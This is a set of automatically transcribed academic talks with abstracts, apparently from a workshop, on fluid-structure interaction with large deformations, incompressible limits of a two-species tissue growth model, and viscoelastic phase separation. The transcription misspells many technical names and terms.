reads, okay, I have the inertial term. I have some divergence of some pressure of some stress tensor sigma, which I will specify in a minute, what is this stress tensor sigma. So this is going to be like a modeling issue and they should be equal to the forces. So it's also Newton's second law. It's just the balance of momentum, nothing special here. And of course, over the mutual boundary, which you hear, this is the mutual boundary between the fluid and the solid, there should be some transition conditions. These transition conditions tell you really how the influence between the two materials goes on. And in our case, we take maybe the most simple transition conditions we can think of. We take the continuity of the velocity over this common boundary, which somehow in the microscopical setting means that all the atoms move as the same fast. And also, we take a continuity of traction, so it means the force over this boundary is continuous. So this here, the first here is really the continuity of velocity, which is clear, but it's written down in this reference configuration because only there we can talk about the solid velocity. And the second here is, you already see, this is the stress tensor applied to the normal, so this is the forces. And here you just have the stress tensor stemming from the Navier-Stokes equation, revered and again to the reference configuration. So this is the boundary terms. And now, okay, so you could say this is a complete model, but it's not because what I'm missing here is really the stress tensor for the solid. So the stress tensor for the solid needs to encode some modeling, and we will put a little bit more complexity here into the solid or allow the stress tensor to be a little bit more complex, particularly because I said that we want to have a look at these large deformations. It's okay. We want to have large deformations. So if you want to do that, then of course, the formation of the solid somehow specifies the boundary of the main or the domain of definition for the fluid. So of course, the deformation of the solid cannot be arbitrary. In fact, in order to set everything up and be in the correct setting, the deformation needs to be homomorphism at least. So we need to choose our stress tensor rightly. In fact, from the point of view of modeling solid materials, this is not like something additional we ask for because when modeling solid materials, asking that formations to be homomorphisms is something really standard or one should do this all the time. So we will of course not consider all the materials. So we will consider only such materials for which the stress tensor is given by two potentials. So one of them is like an energy potential and one of them is like a dissipation potential. So there are really many materials which fall into this class. And I guess similar concept is known in fluid mechanics also, but in solid mechanics, this is most often called the concept of generalized standard materials going back here to half an a million. And this is a concept which gives you like really a wide class of materials which you can think of. And for the talk here, I will further just think of a prototypical example for this energy and dissipations which you want to consider. So let me start with the energy here. The prototypical energy I want to consider looks like this complicated expression here. So let me just talk you a little bit through what I want to have. So the first term here is just a norm. So it tells you how far the gradient more or less is from the identity. So it's an elastic term and here's like the tens of elastic constants. So it's actually the standard Sanctum and Kyrchov energy. So it really just tells me that my material actually would like to be relaxed and is really in a stress-free state once there are no forces. Once it's really an identity mapping here, the deformation gradient, so it's really not the form at all. We also consider some two additional terms. So the first additional term I put here is like inverse of the determinant of the gradient of the formation. So the inverse of the Jacobian of the deformation. And this is really a term which is needed and physical because once you start considering large deformations, it never can be that you could compress a finite amount of the material to zero volume with a finite energy. This should never happen. This should always be penalized. So it's clear that any physically reasonable energy should blow up to infinity as the Jacobian of the deformation goes to zero. And here we just do it in this term. And as a last thing, I consider a regularizing term. So I add here the second gradient of the deformation to the energy, which is something which is maybe not standard and which is sometimes called second grade materials. And we do it for mathematical reasons mostly because we need more regularity. Let me just tell you that if we have the second order term, we will know a little bit more about the deformations of finite energy. In particular, we will know that the Jacobian of any such deformation of finite energy will be bounded away from zero. So it will be positive. There will exist some positive epsilon. And we will know that this determinant will be always bigger than some epsilon. This will tell you that this term here, the first term here, will actually not blow up polynomially, but will be bounded, which is of course important. But it will also be important for us from the point of view of many ways we will see some examples in the talk later. Let me just note that this energy overall is non-convex. And it has to be non-convex because we added this Jacobian here. And this is something physical. So if we want to consider large deformations for the solid, we can never take a convex energy and work with a convex energy. Even this tankfrenam-Kirchhoff energy is non-convex, but OK, so this maybe could be convexified. This is maybe not the point. But the point here is that this blow up would never be possible. OK. So this is like the energy I have in mind. And for the dissipation potential, I think of something very simple. I take a quadratic dissipation here. But of course, I have to take it quadratic, not in the deformation gradient, because that would not be physical, because there would not be an independence of the observer. But I have to do it in the Cauchy-Green-Penzo, which I do here. But of course, the downside of it is that the dissipation potential starts to depend on the state. So we will see later why this is maybe something to highlight a little bit. So OK. So this is the modeling I want to consider. So let me just wrap up and have a look at the strong formulation of what I want to do. So I have the following system. I have here my balance of momentum for the solid. So I have here the inertial term. I have here the derivative of the energy, the derivative of the dissipation potential, the forces. I have here the classical Navier-Stokes equation. I have the divergence, which is somehow missing here. The divergence of v equal to 0. I have the transition conditions between the solid and the fluid. And I have further initial and boundary conditions on this omega. OK. So this is the system I want to consider. And what I ultimately want to do, I want to prove existence of weak solutions. At best, we are a suitable time discretization scheme. So why a time discretization scheme? Because, of course, the domain changes all the time because the solid is moving. So time discretization is somehow something which helps because we can fix the domain for a very short time. OK. So this I want to do. But I will just hit OK. But I want, in order to make things simpler, I want to consider a simpler situation. In fact, I want to, for most of the talk, I will, I will, I will, I will, I will, I will consider a situation of slow movement. So what does it mean, slow movement? It means that the movement of the solid and the fluid is so slow that these inertial terms, which are here, are not needed because they are so small, they can be neglected. So this is something which I would call in the, in the, in the physics or in the modeling of solid materials, we call all this quasi-static because it's almost static. The solid is not moving a lot. For the fluid, it's not really static because it's moving, but it's more, more steady flow. So it's like quasi-static or quasi-steady situation. And this is what I want to consider. So these two inertial terms, I drop. And this is the system that we will have a look at most of the talk. OK. So we have here a system which got parabolic, which consists now only of forces, which are here on the right-hand side, the pressure. But OK, so the pressure. And derivatives of energy and dissipation potentials. Exactly. We have here like energy, we have here dissipation potential. And this diffusion here in, in, in the fluid, I can also understand as a derivative of a dissipation potential because of, yeah, it can be understood in the very same way because it plays the same role. OK. So this is the strong system. So let me now just highlight a little bit how the weak formulation of this system looks. So if I want to design a weak formulation for this, of course, I have to take care of these transition conditions. And you would probably agree that the second transition condition here looks the most ugly. So the continuity of tractions. And it is even the most ugly because it features here the stress tensor, which is something which is the least regular thing we know from, from here because, yeah. So it would be best if we somehow could have this condition somehow disappear. And this is what we can do in the weak formulation. In fact, if we take our test functions, so let me just have a guide to your attention at first to the very end of the weak formulation. So if we take our test functions here, here phi is the test function in the solid and psi is the overall test function, which lives on the whole of omega, but in particular is also the test function for the fluid. So if we take them coupled on the solid part in such a way that they depend on the actual solution, then it's kind of a not too hard computation that in case everything is very smooth for such test functions, this equality of tractions comes out automatically. So let me just have a look. So I have, I will call a pair at a weak solution of this parabolic fluid structure interaction problem if it has some regularity, if they still satisfy the first coupling condition. Okay, and if a weak formulation, which actually just consists of transferring here one derivative and that's more or less this and tested by the right test function holds true. So this is the weak formulation I want to consider. And it's really just magical here that this equality of tractions need not to be considered anymore. Okay. So for this weak formulation, I want to prove that from that there exists weak solutions actually according to this week formulation. So this is the theorem. There exists a weak solution, more or less. So let me just tell you how we prove this theorem. So the proof of the theorem is based on some consecutive minimization in the spirit. So we will set up a lot of minimization problems, which are time spent, the time stepping. So sometimes this is called a time incremental minimization, and it's very much used in solid mechanics. So I just send you here and it actually goes back to the spirit of the Georgie or maybe even earlier and is minimizing movements. So let me have a look how this looks like. So I want to set up this minimization schemes, which looks like minimization or minimizing movements. So I fix a time step size here. I start with some initial data. And if I assume that there is some that I have the eta tk given from my previous step, then I construct the next time step as follows. I minimize the energy plus the dissipation needed to go plus the dissipation somehow needed to go from the last step to the step. So I have here, I minimize here the energy. I here take the dissipation potential, but I multiply this by tau. I take here another dissipation potential, which comes from the fluid. And I also add here the forces. So this is what I minimize. And I minimize it subject to eta just in a natural symbol of space, the divergence of v should be equal to zero. And there is a coupling condition on the boundary between which more or less corresponds to this Dirichlet coupling condition, like the equality of velocities we had before. So let me highlight some features of this scheme. So first of all, there is no conditions on the stresses neither here. So we didn't have it in the weak formulation. And we also don't have it in this time stepping scheme, because the equality of stresses comes out automatically from the minimization, because the energy plus dissipation is only minimal if there is really no stress over the boundary and more or less. Let me have a look that the scheme is somehow explicit implicit. So it's implicit here in the energy. This is important because it allows us to control the Jacobian and the geometry of the whole thing. It is implicit here in the v's and it's implicit in the dissipation in the somehow rate variable, which is here the velocity and here also like the discretized velocity. That is explicit in the state variables. So the state variable would be here, the formation and also for the dissipation of the fluid, the state variable would be the domain on which we live. So in fact, during the minimization, all domains are fixed. The domain for the fluid is given somehow from the last step, as well as here the same holds here for the dissipation potential. And this is actually needed in order to get the right Euler Lagrange equation for the solid. This is something which has already been used and for the fluid we needed to modify this accordingly. And also let me say that we have an explicit dependence here in the coupling condition. So when we couple, we say that the velocities should be the same. In order to couple here the velocities, you also have an explicit relation here. And this is important to really get the stress balance now. So once, okay, so now I can, I mean it's standard in the calculus of variations that I can prove existence of minimizers for the scheme. This is really something very, very simple. So once I have existence of minimizers, I can start doing something with them. And the advantage of having a variational scheme is that I can deduce an energy estimate quite easily. If I compare the energy of the minimizer to say the last step and zero, which is something very like most natural thing one would come up with, I already have here an energy imbalance which is the correct one. So I have here that the energy of the current step plus the dissipation, this is all the dissipation here, is bounded by the energy of the last step plus the force times. So in order, so if I now estimate these force terms, which I can do say by, sorry, which I can do by constant qualities here in order to estimate them into this dissipation, I actually get an energy imbalance immediately. So I have here that the energy plus the total integrated over time dissipation is bound by some constant. So this is like an immediate a priori estimate and actually this a priori estimate is more or less everything that is needed to later to go to the to pass to the limit and to the use the existence of weak solutions. Okay, because we know that these energy and dissipations are coercive in the right way. So this is actually already an a priori estimates, which tells you everything. So let me at this point tell you why a variational scheme is so useful. I mean, okay, it was easy. We compare just the minimizers and we got these energy estimates, but you could say, okay, why not? I mean, I'm not a fan of making variational schemes. I want to discretize my equation directly. So you could do that, of course, but then in order to get an a priori estimate, the standard way what you would do is to test by the velocity. This is something very standard. So in fact, if everything is discretized, we would test by this by this say discretized velocity. So the difference quotients. But if I do that, then I will be given terms which look like this one here. And actually in order to deduce an energy estimate, I would not like to have this gradients here or the derivatives here. I would actually like to estimate this by energies. But in order, I mean, this is just a chain rule. So if everything was continuous, the chain rule holds and everything is great. But once things are time discreet, there is a version of the discrete chain rule, which looks like this one and it would be correct. But it has a but this energy E has to be convex. And our energy is not convex and cannot be convex. So this is somehow the main reason why discretization of the equation directly will probably not lead to the right estimates. So this is something which tells you, no, you have to go to a variational approach. So this variational approach is really like the King's Road to get up to a reestimate in case of large deformations. OK, so once we have the existence of minimizers for our variational scheme, and once we have this energy estimate, we can derive an Euler Lagrange equation. In fact, the only reason why we can do this is that we had this regularized energy and we know that the Jacobian is bounded away from zero. Because in such a case, we can really take a variation and we can really arrive to an Euler Lagrange equation. We would not be able to do this without. But again, this is essential for us because convergence to the weak equation must be done on the level of these Euler Lagrange equations because we have the coupling of test functions. And this coupling of test functions is important for us because it gets risk for this difficult equality of tractions. So actually, once we have this Euler Lagrange equation and once we have the energy estimate, I just told you before, everything is ready and we can now really pass to the limit. The only maybe technical difficulties here to approximate test functions, right? Because the test functions depend on the solution, so they change in the convergence scheme. So one has to do a little some technical work there, but okay, so everything is more or less ready. So now you would say, okay, this was an easy situation because you skip the inertial term and the inertial terms are the only hard ones and you would be right. So now the question is, how can I extend this idea, which seems to be a good one, in case if inertia is present. So let me just have a look at here the equation for the solids. So now before we just consider this part here, the derivatives of the energy and this inertial term we just skipped. Okay, but now I want to get added back to the game, but now I have some incompatibility having here because we saw before that we need to have a variational approximation scheme in order to get a priori estimates because of this non-convexity. On the other hand, if I discretize this inertial term in the most, I mean by some midpoint scheme or whatever, then if I try to compare minimizers, this will never give me the right a priori estimate. Actually for this inertial term, the right thing to do would be to take the equation and to test the equation by the velocity as we did before. This is something I cannot do because I do not have the equations if I minimize. So you could say, oh, so maybe the Euler Lagrange equation and the minimizing problem are equivalent, but they are not because we are working with a non-convex energy. So somehow we have to come up with something and the idea here is that we introduce kind of two levels of approximation. We introduce one level of approximation for this inertial term and then I found a level of approximation for this energy terms. So let me just make a quick argument how this goes. So we take the first level. Oh, so then it's very quick because I only have like two more slides or something. So we first discretize this inertial term by some constant H and once this is discretized, we are in the same situation as we were in the parabolic case. Just like if the inertial term was even not there. So we use the same thing we did before. We may take some minimization problem, pass to the limit and then we are in the continuous case and can deduce further a priori estimates. So this is what I want to have. And let me just have let you make you a one second rough idea on what happens if I also add the inertial term for the fluid, which is the heart because we have the terms here. So what I have to do is I have to discretize it by something how the Navier-Stokes equation is actually deduced. I have to introduce kind of a flow map. So kind of Lagrangian coordinates for the fluid on a very short time step and discretize it by this flow map. Okay, so this is maybe only the rough idea. So let me just point you to the take home messages. We want to have this large structural deformations because of the non-convexity in the energy this calls for a variational approach. And if we want to include inertia and the variational approach, we need two levels of approximation. So thank you for your attention. And this is the reference. So thank you.
In this talk we consider the interaction of a Stokes/Navier-Stokes flow with a viscoelastic body. The elastic body is allowed to undergo large deformations (but no self-collisions). In order to handle this situation correctly, we devise a variational approximation scheme in the spirit of DeGiorgi to the combined problem. Moreover, by using a two-scale scheme, we also extend this approach to the hyperbolic regime including inertia of the solid body. These variational approaches allow us to prove proper energetic estimates while also controling the geometric restictions posed on the solid body and, eventually, to establish existence of weak solutions.
10.14288/1.0398147 (DOI)
So Agnieszka and Miroslav for the invitation to speak here. I must say that the weather in Banff is much better than I expected. So what I'm going to talk about is a relatively simple or, well, at least harmless looking system of PDEs with feasible applications to the biology of tumor growth, living tissues and general. And this is going to be describing some recent results with Benoar-Partam, Marcus Smitian and Nikola Bošle. Oh, okay. So let me dive straight into the equations. So we consider this advection reaction system of equations for two species, healthy cells and abnormal cells, if you will, who are advected by the gradient of this concentration W. Which is related to the pressure via this equation, which we call Brinkman's law. And on the right hand side, you have growth rates for the cells, which importantly depend on the pressure. In a sense, the pressure is the most important factor here, which controls the proliferation of the cells through what is called contact inhibition. Meaning that when the pressure gets too high, the cells are going to sense it and they will just stop dividing. And in this compressible model that I want to present here, the pressure is supposed to be related to the total cell density via a smooth increasing function. And we take for simplicity this power law, which we've seen this week several times already, I think. Okay. So let me mention briefly what the goal is. So we want to, the incompressible limits that is in the title corresponds to passing to the limit k to infinity in this relation here. And therefore, we would obtain a limiting model, which would give us a different description of the tissue, a more geometric, if you will, description of the motion of the tube. Let me start with a few remarks. So if you consider just one equation and absence of viscosity, meaning formally you take nu equals zero here, when the velocity is related to the pressure gradient via Darcy's law, then you just obtain the porous medium equation. And the issue of this limit k to infinity is a long story, which is a well-developed mathematical theory. The limiting equation here being the classical Hellishaw model for incompressible fluid with a free boundary. And there have been plenty of generalizations of this, including proliferation, including nutrients as well, and also extending to systems like we have for two species. However, an important thing to remark here is that for the system, the incompressible limit is only understood in one dimension. So it's not still a complete story in this regard. Of course, all those generalizations that I can imagine that I mentioned, they still use heavily this connection to the porous medium equation in particular for the system, the equation for the total sentence that you obtain by just adding the two equations gives you a porous medium type equation. And you can use, for instance, you can try to derive some adaptation with the classical Arongson-Banielan regularizing effect, which helps in the analysis. In the viscoelastic case, on the other hand, that we are considering, there are some other mathematical, analytical problems in particular, even though viscosities are regularizing effect, the estimates on the pressure are weaker, and this makes it much more strenuous in the end to obtain compactness. In particular, this is due to jump discontinuities of the pressure, both at the boundaries of the supports of the cell densities and on the internal layers, whether to density to populations meet. Okay. Yeah, so this is a very brief, incomplete discussion. Of course, let me just mention that there is a result concerning an incompressible limit for the Navier-Stokes system with a growth term, with a linear growth term by Abelina and Nikola Weschler, and we are actually, in part, we are using very similar techniques. Right. So here are the assumptions. We assume that the function G, that both the functions G, the rates of growth for the cells are decreasing in the pressure. This is what I already said, that the cells can sense the pressure, sense that when the pressure is absent, they want to divide the most that is possible, and as they do, the pressure increases, causing the cells to stop dividing, or at least divide at a smaller rate. So there is this sort of logistic effect here. In particular, there exists this pressure PM, which is the maximal pressure at which the proliferation stops altogether, hence the term homeostatic pressure. As for the data, we take non-negative data, integrable and bounded, such that they converge in the L1 or to some normal functions, and zero infinity. Okay. So before I can state the results, I need also to introduce some other variables and some other equations. So it is very useful in the analysis to consider an equation for the time evolution of the pressure, and also to introduce this variable Rk, which stands for the population concentration of population fraction, if you will. So this is using an equation for the total cell density obtained by just adding the two equations, and of course using the relation between the pressure and this total population density, which gives us this equation, while those population fractions satisfy that equation. And these are very important in all our analysis. In particular, one of the goals is to pass to the limit in the pressure equation. Okay. So let me advertise the results first, and then I'll discuss how we go about proving them. So we have existence and uniqueness of weak solutions to our initial problem. There's not much of an issue. The most important thing that I want to discuss in the title is this incompressible limit. So the main issue is to obtain compactness of the pressure, and we can do that and we can pass to the limit obtaining this system here, which corresponds biologically to a situation where the total population density is limited by some critical value one here. And in unsaturated regions, so when n is less than one, there is no pressure, and the cells are dividing, the populations are growing at different rates, but they are. And the fully saturated regimes where n is equal to this critical value, then the pressure is positive and it satisfies this relation, which comes from the right-hand side of the pressure equation. So that's the system that we converge to as we pass with k to infinity. And okay, let me point out one more thing. I will not speak too much about this segregation, but let me just mention that in the analysis of these kind of models, this is one of the typical questions that you want to address, namely, will the cells that make up the tissue, will they mix like in a homogeneous mixture or will a front form? This is important from the biological point of view. So I'm told that, for instance, immunotherapy can only work if the immune cells can actually mix within the tissue, and if they can't, then they are stopped by the front, and the therapy just won't work. Okay, so back to maths. Here are some estimates that we have. These are the first two are rather standard things. We get positivity, we get L1, L infinity bounds, but nothing more essentially. So in particular, no estimates on the pressure gradient. And one important thing here is this last line, which, as you can see, once I'm able to pass strongly to the limit in those nonlinear terms, this will give me this complementarity relation that we had here on this slide. Okay, so that's an important observation. It comes actually from considering the time evolution for this quantity here in the absolute value, and if you think of it, like, okay, forget the reaction times for a minute, then you have just W minus P, which is Laplacian of W. So we're considering the time evolution of the Laplacian of W. So this does have somehow this iron-soul-baniland flavor, in a sense. Okay, at this point I would like, yes, I think we've managed it, like, I would like to split into two cases, one dimension and multi-dimension, because, well, that's how we did it for one reason and also somehow the methods that are used are orthogonal, in a sense, so I think it's good to mention. But, so I said the main issue is to obtain a strong compactness of the pressure, and in the one-dimensional case, this is possible from some additional regularity estimates on the saddle densities. Okay, in particular, we have this lemma, which follows from a careful grommel estimate using heavily the structure of the problem, meaning that the fact that the functions G are decreasing and also the fact that the pressure gradient has the same sign as the derivative of the total population density. This gives us some appropriate cancellations and helps to close the estimate. So given this additional regularity, we can prove compactness for the pressure sequence, and the main idea here is that even though we are not able to show directly that we control time and space shifts in the pressure itself, but we are able to control them for a non-linear function of the pressure, which actually can be seen from the proof of the previous lemma. And again, when you look at the function phi, this uses heavily this relation between the pressure and the total density. And then, eventually, this leads to compactness in the pressure, but I'll just keep the details. Okay, so this is all contained in this paper with Marcus. So how about the multi-D case? Of course, the previous strategy fails miserably, and we need to look for something else. There are no BV estimates for the system in multi-D, so we need to look for some other ideas. And one idea is given by a previous work of Benoit and Nicolas, who considered an analogous problem in the case of just one species, where they could strengthen the weak convergence of the pressure coming from the upper estimates to strong compactness by observing that the only obstacle to strong compactness is oscillations in the pressure around the values 0 and some other positive value which can be identified in it, which is related to the limiting velocity potential. And then, so what they do is they pass to the limit in the pressure equation using this knowledge and also using a representation of weak limits, of weak non-linear limits of the pressure which comes from a kinetic formulation. And then, yeah, this is enough for them to, for compactness. And so if we tried to mimic this sort of approach, we run into problems very quickly because now we have more involved in non-linearities in the sense that we don't only have the pressure, but we also have this non-linear population fraction. So we somehow have to make sense of that to be able to apply this strategy. And to cut a long story short, we realized that the argument would be fine, it would work. Once we can guarantee that this sequence RK converges strongly. Okay, and hopefully, fortunately, this is the case. It does require a huge lot of effort to show this and it actually shifts the interest back from pressure to the individual densities and for them we are able to derive a compactness result and since I'm running out of time, and this is a short presentation, let me just mention that the main idea of the proof is to use this compactness method as in the paper for compression, for compressible fluids. So here's the final result. Having that, as I said, having compactness of the individual species, we can pass to the limit in the pressure equation and prove the main result. I think I'm out of time, so I'll just show you these. You still have one or two minutes. Okay, so I can just showcase this last slide with some other problems that are still open and I think very interesting in this field. As I mentioned before, the incompressible limits for the Darcy case is only known in one dimension because again in one dimension it was possible to have some BV estimates and pass to the limit in the multi-decay, it's not known what to do and also it would be interesting to see a rigorous derivation of a link between the two in the bring from the Darcy. Okay, that's it. Thank you. Okay, so let's thank Tomek. Thank you.
We study a two-species model of tissue growth describing dynamics under mechanical pressure and cell growth. The pressure is incorporated into the common fluid velocity through an elliptic equation, called Brinkmanâ s law, which accounts for viscosity effects in the individual species. Our aim is to establish the incompressible limit as the stiffness of the pressure law tends to infinity - thus demonstrating a rigorous bridge between the population dynamics of growing tissue at a density level and a geometric model thereof.
10.14288/1.0398141 (DOI)
Mika and Mira for this kind invitation and for opportunity to speak in this workshop. Of course, it will be very nice to meet all of you in person, in month, but at least we have this opportunity to interact and discuss together. And today I would like to speak about our recent research result on viscoelastic phase separation. And this is a joint work with Burkhard Dunbeck and Dominic Spiller, who are from statistical physics and analytical part was done in cooperation with my PhD student, Aaron Brunk. So if I speak about phase separation, we might have different situations. So you might have mixture in which there is no self-iteration in the favor of one space species. And maybe if the environment and situation change, maybe if you increase the temperature, then you might see the separation. So there is the self-interaction in one or the other species as you see here. So we really see separated two phases. And a strain will involve typically these two phases try to reduce the contact area and something like this will happen. And this situation is quite well understood. So in statistical physics, you will find something which is called model H and mathematical literature you find combined, can heliard navier-stokes system. So for those of you who maybe don't know this equation, this is the can heliard equation, it's the false order parabolic equation. Mu is the so-called chemical potential and phi is sitting here for the volume fraction. So how much from one or the other phase do I have? And it's of course coupled to our well-known navier-stokes equations here. They are in incompressible setting. And there is a coupling through this cortex with stress tensor as well as viscosity might depend on phi. And there is a big literature on this model. But statistical physicists realized that this model might not be enough efficient if you are going to describe something like transient gel. So it's a situation where one of the phase is the polymer. Well, and then I have the dynamic asymmetry of components, low and fast. So the relaxation effects happens on different scales. And what I'm having here is the viscoelastic relaxation in pattern formation. Why pattern formation? Because typically the slow phase is trying to create a transient network structure. And what you see here is that the solvent flows through this network structure. It's like the porous media flow. And this phenomena was, as far as I know, firstly, point out by Tanaka 20 years ago. And he called it viscoelastic phase separation. He even proposed the model. And I will speak about that. So what you see in experiments, and this is the first row you have here, is firstly you have kind of the homogeneous structure. But as time evolves, the solvent, which is the gray part here, is aggregulating. And you have the bubbles. They force the polymer to create this network-like structure, which you see here. We have the volume shrinking of the polymeric phase. The solvent phase aggregates more and more. And finally, the network structure is broken, as you see here. So this is the experiment. And it's really the experiment of polyester with this PVME. And that's the solvent. I know what it is. Polyvinyl methyl ether. So that is that. Whatever. These are the numerical simulations in 2 and 3D. And maybe I'll just show you the video. So you see now it comes. Now you will see the network structure of the polymer. The blue is the solvent. Finally, the network structure is broken. And if I let the video running further, you will see the classical phase separation. So at the end of the day, there will be the bubble and the rest. So what is the mathematical model behind? So here are the terms which we are using in the description. Polymer volume fraction phi. Then the bulk stress, viscoelastic stress, and the volume average velocity. So what is bulk stress, which might be new for you, is doing for us. It's kind of additional pressure. And the gradient of bulk stress is acting from the polymer rich phase into the solvent rich phase. So it is oriented around in the opposite direction as the polymer molecules flows or goes. And so it effectively slowed down the coagulation effects of polymers. And it forces polymer rich phase to create this network like structure. Fine. The model can be derived using generic. Or even using this consistent thermodynamical approach, where I prescribe the Helmholtz free energy and entropy production. So what is the Helmholtz free energy or the total energy? It's the mixing energy. It's the energy of bulk stress, the energy of the viscoelastic part, and the kinetic energy. And I just go quick through this page, which is about the cannhiliad. So the mixing energy is the sum of the energy due to this mixing potential. It is actually double well potential. So if I am sitting in one or the other minimum, it's my equilibrium of one of the other phase. But you see there is the other mixing phenomenon appearing here. So in fact, I need some additional kickoff to go through this energy barrier from one to the other stable state. And then there is the additional term, which is actually penalty term. Because to minimize the energy, the aim is to minimize the surface between two phases. So that's kind of the penalizing the interfaces between two phases. OK. So further. OK. This is the model, which is the improvement of the Tanaka model. It was proposed in 2006 by Tsutsang and Weynem E. And you see it's a model consisting of four PDEs. Let me just quickly describe what you have here. First of all, let us concentrate on these first black terms. This is nothing else, just the cannhiliad. So it is diffusive interface interface model. And then this phi equation is coupled with the reaction diffusion equation for bulk stress. And we have two diffusive terms. So if you look on the phi equation and the Q equation, you see this cross diffusion phenomenon, which we have here. And this makes the dynamics, well, or analysis a little bit more complicated. On top of that, I have the Navier-Stokes equation. And of course, I have the coupling with volume fraction equation through this Cortec de V stress. And the coupling with the viscoelastic stress evolution. And they used or they proposed the old droid V model. But of course, you can use your favorite viscoelastic model or model for evolution of viscoelastic stress tensor depending on which material you are modeling. So these models have been used for numerical simulations quite successfully. And we were asking ourselves, what can be done for the understanding from the mathematical point of view? Can we say that the global equation solution exists? Is it maybe unique or unique in some sense? And to this end, we have decided to replace the equation for viscoelastic stress tensor by the equation for the conformation tensor. That's not a problem because the conformation tensor is just the shifted viscoelastic stress tensor. I denote it now by capital T. We use the peterlinkind representation. So I allow more generally more nonlinear dependence here. So usually you will just have C minus I. The most important change with respect to the model I showed you before is that I have diffusive dynamics. So I allow here very small diffusive coefficient in the viscoelastic evolution equation as well as in the Q equation because they are responsible for the similar effects. Now the whole system is dissipative. I have the total energy which consists of the mixing energy, energy of the bulk stress, kinetic energy and the viscoelastic energy. And the model is the dissipative model. On top of that, we have additionally apunovunctional for this system, which is of this type. So now I have really the L2 norm of C. And for that, we have the following inequality. I would just like point out that there is this additional term which has the minus sign. And well, so D is, I cannot say about the sign about the D, but it doesn't matter. I can put it on the right-hand side, do the Grontal argument and I get the estimates which are needed. So for example, I can tell you in the a priori in which space is my solution will live. And due to this cross-diffusion effect, I have however this term. So from this term, I cannot really say you what is the gradient of mu in which chemical potential, in which space it is living. So we need to do something with that. So first of all, let me mention something about the existence and we can prove that we have global weak solution in 2D and we are now writing down the result for 3D. So in order to show the existence of global weak solution, I propose in two steps. First of all, I will consider the regular case and I will tell you what it is. And then the singular case, which is maybe more interested for physicists, is proven as the sequence of regular approximations. So what about the regular case? If I can go back to show you the model again, you see that I have this mobility function sitting here. I have this relaxation coefficient, the coefficient a. And they all depends on phi. And I assume that this are nice. So it means all of these parametric functions are continuous, bounded positively from below and they are bounded from above. I assume that my mobility function will not be zero. So I do not get the generate parabolic situation. And I assume that the polynomial, this mixing double well potential polynomial, sorry, this mixing double well potential is of polynomial type and it is the so-called Kingsburg-Landau potential. So that's a regular case. In the singular case, I will allow the logarithmic, Floryhuggins potential, which physicists like more. And I will also allow that the mobility function really vanish, but only if I am sitting in one or the other phase. Okay. So what about the regular case? So here is the result. I have the global big solution. Well, more or less standard spaces. So for velocity, the things that you will assume, sigma means solenoidal space, phi, right? It's the volume fraction. I had the big, Bill Applashian. So really we can say, show that it is in L2H2 and L infinity H1. And we can show that chemical potential is in L2H1. So how to do that? And there are two steps. First of all, we do the classical energy method and Garkin estimates. And they will tell you, well, from the energy, I showed you the energy. So you are not quite surprised that I have this information. But in the energy, I had this term, right? So I only have that this difference is in L2H2. And I would like to have the information really on the chemical potential. So how to do that? And for that, I do something like entropy estimates. So it means I construct the entropy function, which is the, well, convex function, having the minimum in 1 half. And then I use G prime as the test function in the Caen-Hilliard. So you can think that I am doing grand normalization of the Caen-Hilliard equation, which gives me this entropy equation. And building on that, if I do a little bit more, well, hold the estimates, I end up with the information on phi, which is important for me. And I end up on the information that the chemical potential is living in L2H1. Maya, can I ask you something? Andre here. Yes. In the second displayed line of mathematics, I don't understand this modulus sign that is around minus. Did you not have earlier a combination of these terms without these modulus sign around the minus? Yes. Is that the type? I think we can derive that. But you can, I mean, what is important here is really that you have the difference, right? So we, as you said, we have the difference between these two in L2L2. That's the important information. And from that, we don't know what is the gradient of mu. We cannot say what is the gradient of mu. But doing this renormalized Cahillian equation, I get this information. That's the message. Yes. So what I'm saying before, you had an absolute value of the difference, and now you have a difference of absolute values. Yes, I know. Yeah. But isn't it just simple estimate that you, from below, estimate the absolute value of the difference by the difference of absolute values? Yeah. Yeah, exactly. But it is not essential here. You can think, you have the information of the difference, say in absolute values. You have the information of the difference of absolute value, and I can derive from that by doing this entropy renormalization, the information on the gradient of mu. And that's like what is the point. So now, and OK, so a singular case can be done by the sequence of these regular cases, and a little bit more work with the entropy equation, which gives me, and the phi is in L infinity almost everywhere, and really leaving between 0 and 1. Now, what about the uniqueness? Of course, we might have many weak solutions, but at least, can we say something about weak, strong uniqueness? And the answer is yes. However, we have to do a little bit something because the whole energy is not convex. I have the term, which is the integral of f there, and f is a double well potential. So if I just apply this standard technique, like doing first order Tyler expansion, it will not help me. But what can one do? One can add a penalty term. So I mean, you remember I had these square unknowns, right? So that's the term coming from the mixing energy, and then we have the energy for q, kinetic energy, and this elastic energy. And here we have the expansion of the double well potential, and that will be not convex. So I will convexify the whole relative energy. And of course, this can be done by taking alpha penalty term approach. And it's interesting that this concept is of course known in statistical physics, and it is statistical distance or Brentmont distance in the face space with respect to the energy landscape. In our community, we know that this relative energy can be used to study the strong uniqueness. And indeed, we were able to derive the relative energy inequality. So if z is the weak solution and that hat is the strong solution starting from the same initial data, I have these inequality. And since they start from the same initial data, I have zero on the right hand side. And now D is really the dissipative term. So this is the term we have discussed. It's all of them have the sign, right? So this is really positive. So at the end of the day, we have the weak strong uniqueness. So the weak solution coincide with the strong solution on its lifespan. Now, if I go to the relative energy inequality, I can use it even in other setting or other situation. If I take any, okay, enough small arbitrary functions that had and plug it into the equation, I get some residual. And this residual, if I control them, I can say how far will be z from z hat. So for example, in numerics, I can do the following. I can take my z will be my numerical solution. And that hat will be my exact solution, exact weak solution, which is projected into the finite element space. And for that, it is not so difficult to derive this residual. It's more or less interpolation errors. So this will tell me what is the numerical error. I can control the numerical error in this way. And it was like deja vu for me if I have seen that many coarse-graining models in statistical physics and really in polymer research, what people are deriving, they are derived from the so-called relative entropy. And that's exactly as it is. So they derive coarse-graining model using the relative entropy, which is in our case, relative energy. And I see more potential here to really do rigorous analysis between the fine-scale model and the coarse-grained model. Okay, I finished with two experiments. You remember the picture which I showed you at the beginning. And so we have 40% of polymer. And now at the initial data, and I am in rest. And now I randomly perturbed it and the random perturbation is very small. And now I can ask how good is my numerical method or how good is the simulation I showed you. So here you see it. This is the measure refinement with respect to, like, finest of the method. And here this is the relative energy. And for this experiment, the relative energy gives me the first order. And if I change it, so I do not take the random perturbation, but small, very oscillatory, but, like, smooth perturbation, and do the same, then the relative energy even decreases with the second order. And I did not tell you what is the method. So it is the characteristic method, finite element. But I mean, it's just the, like, illustration that this relative energy can be really used to discuss also the convergence order numerical method. And with that, I will stop and thank you for your attention. Thank you very much, Maria, for your lecture.
